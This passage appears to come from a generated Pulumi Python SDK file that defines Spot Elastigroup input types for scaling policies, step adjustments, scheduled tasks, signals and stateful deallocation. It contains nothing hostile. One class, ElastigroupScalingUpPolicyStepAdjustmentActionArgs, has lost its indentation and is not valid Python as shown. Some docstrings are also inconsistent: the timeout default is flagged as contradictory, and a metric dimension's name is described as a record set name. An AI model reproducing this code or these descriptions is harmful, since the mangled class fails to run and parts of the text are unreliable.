                 statistic: Optional[pulumi.Input[str]] = None,
                 step_adjustments: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingUpPolicyStepAdjustmentArgs']]]] = None,
                 target: Optional[pulumi.Input[str]] = None,
                 threshold: Optional[pulumi.Input[float]] = None,
                 unit: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] metric_name: The name of the metric, with or without spaces.
        :param pulumi.Input[str] namespace: The namespace for the alarm's associated metric.
        :param pulumi.Input[str] policy_name: The name of the policy.
        :param pulumi.Input[str] action_type: The type of action to perform for scaling. Valid values: `"adjustment"`, `"percentageAdjustment"`, `"setMaxTarget"`, `"setMinTarget"`, `"updateCapacity"`. If a `step_adjustment` object is defined, then it cannot be specified.
        :param pulumi.Input[str] adjustment: The number of instances to add/remove to/from the target capacity when scale is needed. Can be used as advanced expression for scaling of instances to add/remove to/from the target capacity when scale is needed. You can see more information here: Advanced expression. Example value: `"MAX(currCapacity / 5, value * 10)"`
        :param pulumi.Input[int] cooldown: The amount of time, in seconds, after a scaling activity completes and before the next scaling activity can start. If this parameter is not specified, the default cooldown period for the group applies.
        :param pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingUpPolicyDimensionArgs']]] dimensions: A list of dimensions describing qualities of the metric.
        :param pulumi.Input[int] evaluation_periods: The number of periods over which data is compared to the specified threshold.
        :param pulumi.Input[bool] is_enabled: Specifies whether the scaling policy described in this block is enabled.
        :param pulumi.Input[str] max_target_capacity: The desired target capacity of a group. Required if using `"setMaxTarget"` as action type
        :param pulumi.Input[str] maximum: The maximal number of instances to have in the group.
        :param pulumi.Input[str] min_target_capacity: The number of the desired target (and minimum) capacity
        :param pulumi.Input[str] minimum: The minimal number of instances to have in the group.
        :param pulumi.Input[str] operator: The operator to use in order to determine if the scaling policy is applicable. Valid values: `"gt"`, `"gte"`, `"lt"`, `"lte"`.
        :param pulumi.Input[int] period: The granularity, in seconds, of the returned datapoints. Period must be at least 60 seconds and must be a multiple of 60.
        :param pulumi.Input[str] source: The source of the metric. Valid values: `"cloudWatch"`, `"spectrum"`.
        :param pulumi.Input[str] statistic: The metric statistics to return. For information about specific statistics go to [Statistics](http://docs.aws.amazon.com/AmazonCloudWatch/latest/DeveloperGuide/index.html?CHAP_TerminologyandKeyConcepts.html#Statistic) in the Amazon CloudWatch Developer Guide.
        :param pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingUpPolicyStepAdjustmentArgs']]] step_adjustments: A list of step-adjustment blocks; mutually exclusive with `action_type`.
        :param pulumi.Input[str] target: The target number of instances to have in the group.
        :param pulumi.Input[float] threshold: The value against which the specified statistic is compared in order to determine if a step should be applied.
        :param pulumi.Input[str] unit: The unit for the alarm's associated metric. Valid values: `"percent"`, `"seconds"`, `"microseconds"`, `"milliseconds"`, `"bytes"`, `"kilobytes"`, `"megabytes"`, `"gigabytes"`, `"terabytes"`, `"bits"`, `"kilobits"`, `"megabits"`, `"gigabits"`, `"terabits"`, `"count"`, `"bytes/second"`, `"kilobytes/second"`, `"megabytes/second"`, `"gigabytes/second"`, `"terabytes/second"`, `"bits/second"`, `"kilobits/second"`, `"megabits/second"`, `"gigabits/second"`, `"terabits/second"`, `"count/second"`, `"none"`.
        """
        # Required arguments are always stored.
        pulumi.set(__self__, "metric_name", metric_name)
        pulumi.set(__self__, "namespace", namespace)
        pulumi.set(__self__, "policy_name", policy_name)
        # Optional arguments are stored only when explicitly provided, so that
        # unset values never appear in the serialized input type.
        for arg_name, arg_value in (
                ("action_type", action_type),
                ("adjustment", adjustment),
                ("cooldown", cooldown),
                ("dimensions", dimensions),
                ("evaluation_periods", evaluation_periods),
                ("is_enabled", is_enabled),
                ("max_target_capacity", max_target_capacity),
                ("maximum", maximum),
                ("min_target_capacity", min_target_capacity),
                ("minimum", minimum),
                ("operator", operator),
                ("period", period),
                ("source", source),
                ("statistic", statistic),
                ("step_adjustments", step_adjustments),
                ("target", target),
                ("threshold", threshold),
                ("unit", unit)):
            if arg_value is not None:
                pulumi.set(__self__, arg_name, arg_value)

    @property
    @pulumi.getter(name="metricName")
    def metric_name(self) -> pulumi.Input[str]:
        """
        The name of the metric, with or without spaces.
        """
        return pulumi.get(self, "metric_name")

    @metric_name.setter
    def metric_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "metric_name", value)

    @property
    @pulumi.getter
    def namespace(self) -> pulumi.Input[str]:
        """
        The namespace for the alarm's associated metric.
        """
        return pulumi.get(self, "namespace")

    @namespace.setter
    def namespace(self, value: pulumi.Input[str]):
        pulumi.set(self, "namespace", value)

    @property
    @pulumi.getter(name="policyName")
    def policy_name(self) -> pulumi.Input[str]:
        """
        The name of the policy.
        """
        return pulumi.get(self, "policy_name")

    @policy_name.setter
    def policy_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "policy_name", value)

    @property
    @pulumi.getter(name="actionType")
    def action_type(self) -> Optional[pulumi.Input[str]]:
        """
        The type of action to perform for scaling. Valid values: `"adjustment"`, `"percentageAdjustment"`, `"setMaxTarget"`, `"setMinTarget"`, `"updateCapacity"`. If a `step_adjustment` object is defined, then it cannot be specified.
        """
        return pulumi.get(self, "action_type")

    @action_type.setter
    def action_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "action_type", value)

    @property
    @pulumi.getter
    def adjustment(self) -> Optional[pulumi.Input[str]]:
        """
        The number of instances to add/remove to/from the target capacity when scale is needed. Can be used as advanced expression for scaling of instances to add/remove to/from the target capacity when scale is needed. You can see more information here: Advanced expression. Example value: `"MAX(currCapacity / 5, value * 10)"`
        """
        return pulumi.get(self, "adjustment")

    @adjustment.setter
    def adjustment(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "adjustment", value)

    @property
    @pulumi.getter
    def cooldown(self) -> Optional[pulumi.Input[int]]:
        """
        The amount of time, in seconds, after a scaling activity completes and before the next scaling activity can start. If this parameter is not specified, the default cooldown period for the group applies.
        """
        return pulumi.get(self, "cooldown")

    @cooldown.setter
    def cooldown(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "cooldown", value)

    @property
    @pulumi.getter
    def dimensions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingUpPolicyDimensionArgs']]]]:
        """
        A list of dimensions describing qualities of the metric.
        """
        return pulumi.get(self, "dimensions")

    @dimensions.setter
    def dimensions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingUpPolicyDimensionArgs']]]]):
        pulumi.set(self, "dimensions", value)

    @property
    @pulumi.getter(name="evaluationPeriods")
    def evaluation_periods(self) -> Optional[pulumi.Input[int]]:
        """
        The number of periods over which data is compared to the specified threshold.
        """
        return pulumi.get(self, "evaluation_periods")

    @evaluation_periods.setter
    def evaluation_periods(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "evaluation_periods", value)

    @property
    @pulumi.getter(name="isEnabled")
    def is_enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Specifies whether the scaling policy described in this block is enabled.
        """
        return pulumi.get(self, "is_enabled")

    @is_enabled.setter
    def is_enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "is_enabled", value)

    @property
    @pulumi.getter(name="maxTargetCapacity")
    def max_target_capacity(self) -> Optional[pulumi.Input[str]]:
        """
        The desired target capacity of a group. Required if using `"setMaxTarget"` as action type
        """
        return pulumi.get(self, "max_target_capacity")

    @max_target_capacity.setter
    def max_target_capacity(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "max_target_capacity", value)

    @property
    @pulumi.getter
    def maximum(self) -> Optional[pulumi.Input[str]]:
        """
        The maximal number of instances to have in the group.
        """
        return pulumi.get(self, "maximum")

    @maximum.setter
    def maximum(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "maximum", value)

    @property
    @pulumi.getter(name="minTargetCapacity")
    def min_target_capacity(self) -> Optional[pulumi.Input[str]]:
        """
        The number of the desired target (and minimum) capacity
        """
        return pulumi.get(self, "min_target_capacity")

    @min_target_capacity.setter
    def min_target_capacity(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "min_target_capacity", value)

    @property
    @pulumi.getter
    def minimum(self) -> Optional[pulumi.Input[str]]:
        """
        The minimal number of instances to have in the group.
        """
        return pulumi.get(self, "minimum")

    @minimum.setter
    def minimum(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "minimum", value)

    @property
    @pulumi.getter
    def operator(self) -> Optional[pulumi.Input[str]]:
        """
        The operator to use in order to determine if the scaling policy is applicable. Valid values: `"gt"`, `"gte"`, `"lt"`, `"lte"`.
        """
        return pulumi.get(self, "operator")

    @operator.setter
    def operator(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "operator", value)

    @property
    @pulumi.getter
    def period(self) -> Optional[pulumi.Input[int]]:
        """
        The granularity, in seconds, of the returned datapoints. Period must be at least 60 seconds and must be a multiple of 60.
        """
        return pulumi.get(self, "period")

    @period.setter
    def period(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "period", value)

    @property
    @pulumi.getter
    def source(self) -> Optional[pulumi.Input[str]]:
        """
        The source of the metric. Valid values: `"cloudWatch"`, `"spectrum"`.
        """
        return pulumi.get(self, "source")

    @source.setter
    def source(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "source", value)

    @property
    @pulumi.getter
    def statistic(self) -> Optional[pulumi.Input[str]]:
        """
        The metric statistics to return. For information about specific statistics go to [Statistics](http://docs.aws.amazon.com/AmazonCloudWatch/latest/DeveloperGuide/index.html?CHAP_TerminologyandKeyConcepts.html#Statistic) in the Amazon CloudWatch Developer Guide.
        """
        return pulumi.get(self, "statistic")

    @statistic.setter
    def statistic(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "statistic", value)

    @property
    @pulumi.getter(name="stepAdjustments")
    def step_adjustments(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingUpPolicyStepAdjustmentArgs']]]]:
        """
        A list of step-adjustment blocks; mutually exclusive with `action_type`.
        """
        return pulumi.get(self, "step_adjustments")

    @step_adjustments.setter
    def step_adjustments(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingUpPolicyStepAdjustmentArgs']]]]):
        pulumi.set(self, "step_adjustments", value)

    @property
    @pulumi.getter
    def target(self) -> Optional[pulumi.Input[str]]:
        """
        The target number of instances to have in the group.
        """
        return pulumi.get(self, "target")

    @target.setter
    def target(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "target", value)

    @property
    @pulumi.getter
    def threshold(self) -> Optional[pulumi.Input[float]]:
        """
        The value against which the specified statistic is compared in order to determine if a step should be applied.
        """
        return pulumi.get(self, "threshold")

    @threshold.setter
    def threshold(self, value: Optional[pulumi.Input[float]]):
        pulumi.set(self, "threshold", value)

    @property
    @pulumi.getter
    def unit(self) -> Optional[pulumi.Input[str]]:
        """
        The unit for the alarm's associated metric. Valid values: `"percent"`, `"seconds"`, `"microseconds"`, `"milliseconds"`, `"bytes"`, `"kilobytes"`, `"megabytes"`, `"gigabytes"`, `"terabytes"`, `"bits"`, `"kilobits"`, `"megabits"`, `"gigabits"`, `"terabits"`, `"count"`, `"bytes/second"`, `"kilobytes/second"`, `"megabytes/second"`, `"gigabytes/second"`, `"terabytes/second"`, `"bits/second"`, `"kilobits/second"`, `"megabits/second"`, `"gigabits/second"`, `"terabits/second"`, `"count/second"`, `"none"`.
        """
        return pulumi.get(self, "unit")

    @unit.setter
    def unit(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "unit", value)
@pulumi.input_type
class ElastigroupScalingUpPolicyDimensionArgs:
    """A single CloudWatch-style metric dimension for a scale-up policy."""

    def __init__(__self__, *,
                 name: pulumi.Input[str],
                 value: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] name: The record set name.
        :param pulumi.Input[str] value: The dimension value.
        """
        # ``name`` is required; ``value`` is recorded only when supplied.
        provided = {"name": name}
        if value is not None:
            provided["value"] = value
        for key, val in provided.items():
            pulumi.set(__self__, key, val)

    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """
        The record set name.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def value(self) -> Optional[pulumi.Input[str]]:
        """
        The dimension value.
        """
        return pulumi.get(self, "value")

    @value.setter
    def value(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "value", value)
@pulumi.input_type
class ElastigroupScalingUpPolicyStepAdjustmentArgs:
    """One step of a scale-up policy: a threshold plus the action it triggers."""

    def __init__(__self__, *,
                 action: pulumi.Input['ElastigroupScalingUpPolicyStepAdjustmentActionArgs'],
                 threshold: pulumi.Input[int]):
        """
        :param pulumi.Input['ElastigroupScalingUpPolicyStepAdjustmentActionArgs'] action: Action to take. Valid values: `REPLACE_SERVER`, `RESTART_SERVER`.
        :param pulumi.Input[int] threshold: The value against which the specified statistic is compared. If a `step_adjustment` object is defined, then it cannot be specified.
        """
        # Both arguments are required, so store them unconditionally.
        for key, val in (("action", action), ("threshold", threshold)):
            pulumi.set(__self__, key, val)

    @property
    @pulumi.getter
    def action(self) -> pulumi.Input['ElastigroupScalingUpPolicyStepAdjustmentActionArgs']:
        """
        Action to take. Valid values: `REPLACE_SERVER`, `RESTART_SERVER`.
        """
        return pulumi.get(self, "action")

    @action.setter
    def action(self, value: pulumi.Input['ElastigroupScalingUpPolicyStepAdjustmentActionArgs']):
        pulumi.set(self, "action", value)

    @property
    @pulumi.getter
    def threshold(self) -> pulumi.Input[int]:
        """
        The value against which the specified statistic is compared. If a `step_adjustment` object is defined, then it cannot be specified.
        """
        return pulumi.get(self, "threshold")

    @threshold.setter
    def threshold(self, value: pulumi.Input[int]):
        pulumi.set(self, "threshold", value)
@pulumi.input_type
class ElastigroupScalingUpPolicyStepAdjustmentActionArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
adjustment: Optional[pulumi.Input[str]] = None,
max_target_capacity: Optional[pulumi.Input[str]] = None,
maximum: Optional[pulumi.Input[str]] = None,
min_target_capacity: Optional[pulumi.Input[str]] = None,
minimum: Optional[pulumi.Input[str]] = None,
target: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] type: String, Action type. Supported action types: `pause`, `resume`, `recycle`, `deallocate`.
:param pulumi.Input[str] adjustment: The number of instances to add or remove.
:param pulumi.Input[str] max_target_capacity: The desired target capacity of a group. Required if using `"setMaxTarget"` as action type
:param pulumi.Input[str] maximum: The upper limit number of instances that you can scale up to. Required if using `"updateCapacity"` as action type and neither `"target"` nor `"minimum"` are not defined.
:param pulumi.Input[str] min_target_capacity: The desired target capacity of a group. Required if using `"setMinTarget"` as action type
:param pulumi.Input[str] minimum: The lower limit number of instances that you can scale down to. Required if using `"updateCapacity"` as action type and neither `"target"` nor `"maximum"` are not defined.
:param pulumi.Input[str] target: The desired number of instances. Required if using `"updateCapacity"` as action type and neither `"minimum"` nor `"maximum"` are not defined.
"""
pulumi.set(__self__, "type", type)
if adjustment is not None:
pulumi.set(__self__, "adjustment", adjustment)
if max_target_capacity is not None:
pulumi.set(__self__, "max_target_capacity", max_target_capacity)
if maximum is not None:
pulumi.set(__self__, "maximum", maximum)
if min_target_capacity is not None:
pulumi.set(__self__, "min_target_capacity", min_target_capacity)
if minimum is not None:
pulumi.set(__self__, "minimum", minimum)
if target is not None:
pulumi.set(__self__, "target", target)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
String, Action type. Supported action types: `pause`, `resume`, `recycle`, `deallocate`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def adjustment(self) -> Optional[pulumi.Input[str]]:
"""
The number of instances to add or remove.
"""
return pulumi.get(self, "adjustment")
@adjustment.setter
def adjustment(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "adjustment", value)
@property
@pulumi.getter(name="maxTargetCapacity")
def max_target_capacity(self) -> Optional[pulumi.Input[str]]:
"""
The desired target capacity of a group. Required if using `"setMaxTarget"` as action type
"""
return pulumi.get(self, "max_target_capacity")
@max_target_capacity.setter
def max_target_capacity(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "max_target_capacity", value)
@property
@pulumi.getter
def maximum(self) -> Optional[pulumi.Input[str]]:
"""
The upper limit number of instances that you can scale up to. Required if using `"updateCapacity"` as action type and neither `"target"` nor `"minimum"` are not defined.
"""
return pulumi.get(self, "maximum")
@maximum.setter
def maximum(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "maximum", value)
@property
@pulumi.getter(name="minTargetCapacity")
def min_target_capacity(self) -> Optional[pulumi.Input[str]]:
"""
The desired target capacity of a group. Required if using `"setMinTarget"` as action type
"""
return pulumi.get(self, "min_target_capacity")
@min_target_capacity.setter
def min_target_capacity(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "min_target_capacity", value)
@property
@pulumi.getter
def minimum(self) -> Optional[pulumi.Input[str]]:
    """
    The lower limit number of instances that you can scale down to. Required if using `"updateCapacity"` as action type and neither `"target"` nor `"maximum"` is defined.
    """
    return pulumi.get(self, "minimum")

@minimum.setter
def minimum(self, value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "minimum", value)
@property
@pulumi.getter
def target(self) -> Optional[pulumi.Input[str]]:
    """
    The desired number of instances. Required if using `"updateCapacity"` as action type and neither `"minimum"` nor `"maximum"` is defined.
    """
    return pulumi.get(self, "target")

@target.setter
def target(self, value: Optional[pulumi.Input[str]]):
    pulumi.set(self, "target", value)
@pulumi.input_type
class ElastigroupScheduledTaskArgs:
    def __init__(__self__, *,
                 task_type: pulumi.Input[str],
                 adjustment: Optional[pulumi.Input[str]] = None,
                 adjustment_percentage: Optional[pulumi.Input[str]] = None,
                 batch_size_percentage: Optional[pulumi.Input[str]] = None,
                 cron_expression: Optional[pulumi.Input[str]] = None,
                 frequency: Optional[pulumi.Input[str]] = None,
                 grace_period: Optional[pulumi.Input[str]] = None,
                 is_enabled: Optional[pulumi.Input[bool]] = None,
                 max_capacity: Optional[pulumi.Input[str]] = None,
                 min_capacity: Optional[pulumi.Input[str]] = None,
                 scale_max_capacity: Optional[pulumi.Input[str]] = None,
                 scale_min_capacity: Optional[pulumi.Input[str]] = None,
                 scale_target_capacity: Optional[pulumi.Input[str]] = None,
                 start_time: Optional[pulumi.Input[str]] = None,
                 target_capacity: Optional[pulumi.Input[str]] = None):
        """
        Configuration of a scheduled task for an Elastigroup.

        :param pulumi.Input[str] task_type: The task type to run. Supported task types are: `"scale"`, `"backup_ami"`, `"roll"`, `"scaleUp"`, `"percentageScaleUp"`, `"scaleDown"`, `"percentageScaleDown"`, `"statefulUpdateCapacity"`.
        :param pulumi.Input[str] adjustment: The number of instances to add or remove.
        :param pulumi.Input[str] adjustment_percentage: The percentage of instances to add or remove.
        :param pulumi.Input[str] batch_size_percentage: The percentage size of each batch in the scheduled deployment roll.
        :param pulumi.Input[str] cron_expression: A valid cron expression. The cron runs in the UTC time zone and uses [Unix cron format](https://en.wikipedia.org/wiki/Cron).
        :param pulumi.Input[str] frequency: The recurrence frequency to run this task. Supported values are `"hourly"`, `"daily"`, `"weekly"` and `"continuous"`.
        :param pulumi.Input[str] grace_period: The period of time (seconds) to wait before checking a batch's health after its deployment.
        :param pulumi.Input[bool] is_enabled: Whether the task is enabled or disabled.
        :param pulumi.Input[str] max_capacity: The maximum number of instances the group should have.
        :param pulumi.Input[str] min_capacity: The minimum number of instances the group should have.
        :param pulumi.Input[str] scale_max_capacity: The maximum number of instances the group should have.
        :param pulumi.Input[str] scale_min_capacity: The minimum number of instances the group should have.
        :param pulumi.Input[str] scale_target_capacity: The desired number of instances the group should have.
        :param pulumi.Input[str] start_time: A start time for one-time tasks.
        :param pulumi.Input[str] target_capacity: The desired number of instances the group should have.
        """
        # The task type is mandatory; everything else is forwarded only when the
        # caller actually supplied a value, so unset fields stay absent.
        pulumi.set(__self__, "task_type", task_type)
        optional_args = {
            "adjustment": adjustment,
            "adjustment_percentage": adjustment_percentage,
            "batch_size_percentage": batch_size_percentage,
            "cron_expression": cron_expression,
            "frequency": frequency,
            "grace_period": grace_period,
            "is_enabled": is_enabled,
            "max_capacity": max_capacity,
            "min_capacity": min_capacity,
            "scale_max_capacity": scale_max_capacity,
            "scale_min_capacity": scale_min_capacity,
            "scale_target_capacity": scale_target_capacity,
            "start_time": start_time,
            "target_capacity": target_capacity,
        }
        for attr_name, attr_value in optional_args.items():
            if attr_value is not None:
                pulumi.set(__self__, attr_name, attr_value)

    @property
    @pulumi.getter(name="taskType")
    def task_type(self) -> pulumi.Input[str]:
        """
        The task type to run. One of `"scale"`, `"backup_ami"`, `"roll"`, `"scaleUp"`, `"percentageScaleUp"`, `"scaleDown"`, `"percentageScaleDown"`, `"statefulUpdateCapacity"`.
        """
        return pulumi.get(self, "task_type")

    @task_type.setter
    def task_type(self, value: pulumi.Input[str]):
        pulumi.set(self, "task_type", value)

    @property
    @pulumi.getter
    def adjustment(self) -> Optional[pulumi.Input[str]]:
        """
        Number of instances to add or remove when the task runs.
        """
        return pulumi.get(self, "adjustment")

    @adjustment.setter
    def adjustment(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "adjustment", value)

    @property
    @pulumi.getter(name="adjustmentPercentage")
    def adjustment_percentage(self) -> Optional[pulumi.Input[str]]:
        """
        Percentage of instances to add or remove when the task runs.
        """
        return pulumi.get(self, "adjustment_percentage")

    @adjustment_percentage.setter
    def adjustment_percentage(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "adjustment_percentage", value)

    @property
    @pulumi.getter(name="batchSizePercentage")
    def batch_size_percentage(self) -> Optional[pulumi.Input[str]]:
        """
        Size, in percent, of each batch in the scheduled deployment roll.
        """
        return pulumi.get(self, "batch_size_percentage")

    @batch_size_percentage.setter
    def batch_size_percentage(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "batch_size_percentage", value)

    @property
    @pulumi.getter(name="cronExpression")
    def cron_expression(self) -> Optional[pulumi.Input[str]]:
        """
        A valid cron expression, evaluated in the UTC time zone, in [Unix cron format](https://en.wikipedia.org/wiki/Cron).
        """
        return pulumi.get(self, "cron_expression")

    @cron_expression.setter
    def cron_expression(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "cron_expression", value)

    @property
    @pulumi.getter
    def frequency(self) -> Optional[pulumi.Input[str]]:
        """
        Recurrence frequency for this task: `"hourly"`, `"daily"`, `"weekly"` or `"continuous"`.
        """
        return pulumi.get(self, "frequency")

    @frequency.setter
    def frequency(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "frequency", value)

    @property
    @pulumi.getter(name="gracePeriod")
    def grace_period(self) -> Optional[pulumi.Input[str]]:
        """
        Time (seconds) to wait before checking a batch's health after its deployment.
        """
        return pulumi.get(self, "grace_period")

    @grace_period.setter
    def grace_period(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "grace_period", value)

    @property
    @pulumi.getter(name="isEnabled")
    def is_enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether the task is enabled.
        """
        return pulumi.get(self, "is_enabled")

    @is_enabled.setter
    def is_enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "is_enabled", value)

    @property
    @pulumi.getter(name="maxCapacity")
    def max_capacity(self) -> Optional[pulumi.Input[str]]:
        """
        Maximum number of instances the group should have.
        """
        return pulumi.get(self, "max_capacity")

    @max_capacity.setter
    def max_capacity(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "max_capacity", value)

    @property
    @pulumi.getter(name="minCapacity")
    def min_capacity(self) -> Optional[pulumi.Input[str]]:
        """
        Minimum number of instances the group should have.
        """
        return pulumi.get(self, "min_capacity")

    @min_capacity.setter
    def min_capacity(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "min_capacity", value)

    @property
    @pulumi.getter(name="scaleMaxCapacity")
    def scale_max_capacity(self) -> Optional[pulumi.Input[str]]:
        """
        Maximum number of instances the group should have.
        """
        return pulumi.get(self, "scale_max_capacity")

    @scale_max_capacity.setter
    def scale_max_capacity(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "scale_max_capacity", value)

    @property
    @pulumi.getter(name="scaleMinCapacity")
    def scale_min_capacity(self) -> Optional[pulumi.Input[str]]:
        """
        Minimum number of instances the group should have.
        """
        return pulumi.get(self, "scale_min_capacity")

    @scale_min_capacity.setter
    def scale_min_capacity(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "scale_min_capacity", value)

    @property
    @pulumi.getter(name="scaleTargetCapacity")
    def scale_target_capacity(self) -> Optional[pulumi.Input[str]]:
        """
        Desired number of instances the group should have.
        """
        return pulumi.get(self, "scale_target_capacity")

    @scale_target_capacity.setter
    def scale_target_capacity(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "scale_target_capacity", value)

    @property
    @pulumi.getter(name="startTime")
    def start_time(self) -> Optional[pulumi.Input[str]]:
        """
        Start time for one-time tasks.
        """
        return pulumi.get(self, "start_time")

    @start_time.setter
    def start_time(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "start_time", value)

    @property
    @pulumi.getter(name="targetCapacity")
    def target_capacity(self) -> Optional[pulumi.Input[str]]:
        """
        Desired number of instances the group should have.
        """
        return pulumi.get(self, "target_capacity")

    @target_capacity.setter
    def target_capacity(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "target_capacity", value)
@pulumi.input_type
class ElastigroupSignalArgs:
    def __init__(__self__, *,
                 name: pulumi.Input[str],
                 timeout: Optional[pulumi.Input[int]] = None):
        """
        A health signal definition for the group.

        :param pulumi.Input[str] name: The name of the signal defined for the group. Valid Values: `"INSTANCE_READY"`, `"INSTANCE_READY_TO_SHUTDOWN"`
        :param pulumi.Input[int] timeout: The signal's timeout, in seconds.
            NOTE(review): the generated upstream text reads "default is 40 minutes
            (1800 seconds)", but 1800 seconds is 30 minutes — the two figures
            disagree; confirm the actual default against the Spot API docs.
        """
        pulumi.set(__self__, "name", name)
        if timeout is not None:
            pulumi.set(__self__, "timeout", timeout)

    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """
        The name of the signal defined for the group. Valid Values: `"INSTANCE_READY"`, `"INSTANCE_READY_TO_SHUTDOWN"`
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def timeout(self) -> Optional[pulumi.Input[int]]:
        """
        The signal's timeout, in seconds.
        NOTE(review): upstream says "default is 40 minutes (1800 seconds)" —
        1800 s is 30 min, so one of the figures is wrong; verify before relying on it.
        """
        return pulumi.get(self, "timeout")

    @timeout.setter
    def timeout(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "timeout", value)
@pulumi.input_type
class ElastigroupStatefulDeallocationArgs:
    def __init__(__self__, *,
                 should_delete_images: Optional[pulumi.Input[bool]] = None,
                 should_delete_network_interfaces: Optional[pulumi.Input[bool]] = None,
                 should_delete_snapshots: Optional[pulumi.Input[bool]] = None,
                 should_delete_volumes: Optional[pulumi.Input[bool]] = None):
        """
        Cleanup flags applied when deallocating a stateful group.

        :param pulumi.Input[bool] should_delete_images: For stateful groups: remove persistent images.
        :param pulumi.Input[bool] should_delete_network_interfaces: For stateful groups: remove network interfaces.
        :param pulumi.Input[bool] should_delete_snapshots: For stateful groups: remove snapshots.
        :param pulumi.Input[bool] should_delete_volumes: For stateful groups: remove persistent volumes.
        """
        # All flags are optional; record only those the caller supplied.
        flags = {
            "should_delete_images": should_delete_images,
            "should_delete_network_interfaces": should_delete_network_interfaces,
            "should_delete_snapshots": should_delete_snapshots,
            "should_delete_volumes": should_delete_volumes,
        }
        for flag_name, flag_value in flags.items():
            if flag_value is not None:
                pulumi.set(__self__, flag_name, flag_value)

    @property
    @pulumi.getter(name="shouldDeleteImages")
    def should_delete_images(self) -> Optional[pulumi.Input[bool]]:
        """
        For stateful groups: remove persistent images on deallocation.
        """
        return pulumi.get(self, "should_delete_images")

    @should_delete_images.setter
    def should_delete_images(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "should_delete_images", value)

    @property
    @pulumi.getter(name="shouldDeleteNetworkInterfaces")
    def should_delete_network_interfaces(self) -> Optional[pulumi.Input[bool]]:
        """
        For stateful groups: remove network interfaces on deallocation.
        """
        return pulumi.get(self, "should_delete_network_interfaces")

    @should_delete_network_interfaces.setter
    def should_delete_network_interfaces(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "should_delete_network_interfaces", value)

    @property
    @pulumi.getter(name="shouldDeleteSnapshots")
    def should_delete_snapshots(self) -> Optional[pulumi.Input[bool]]:
        """
        For stateful groups: remove snapshots on deallocation.
        """
        return pulumi.get(self, "should_delete_snapshots")

    @should_delete_snapshots.setter
    def should_delete_snapshots(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "should_delete_snapshots", value)

    @property
    @pulumi.getter(name="shouldDeleteVolumes")
    def should_delete_volumes(self) -> Optional[pulumi.Input[bool]]:
        """
        For stateful groups: remove persistent volumes on deallocation.
        """
        return pulumi.get(self, "should_delete_volumes")

    @should_delete_volumes.setter
    def should_delete_volumes(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "should_delete_volumes", value)
@pulumi.input_type
class ElastigroupStatefulInstanceActionArgs:
    def __init__(__self__, *,
                 stateful_instance_id: pulumi.Input[str],
                 type: pulumi.Input[str]):
        """
        An action to perform on a specific stateful instance.

        :param pulumi.Input[str] stateful_instance_id: String, Stateful Instance ID on which the action should be performed.
